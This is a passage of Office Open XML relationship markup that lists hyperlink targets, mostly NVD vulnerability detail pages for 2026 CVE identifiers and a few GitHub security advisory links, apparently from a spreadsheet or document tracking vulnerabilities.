Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86283" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6rj2-96f5-chj9" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-89ff-m8wv-p99r" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-w672-239g-c3gr" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74236" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51008" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15580" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15933" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34964" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53602" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53757" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59696" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId1490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62993" TargetMode="External" Id="rId1491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67279" TargetMode="External" Id="rId1492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67321" TargetMode="External" Id="rId1493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69112" TargetMode="External" Id="rId1494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73848" TargetMode="External" Id="rId1495" /><Relationship 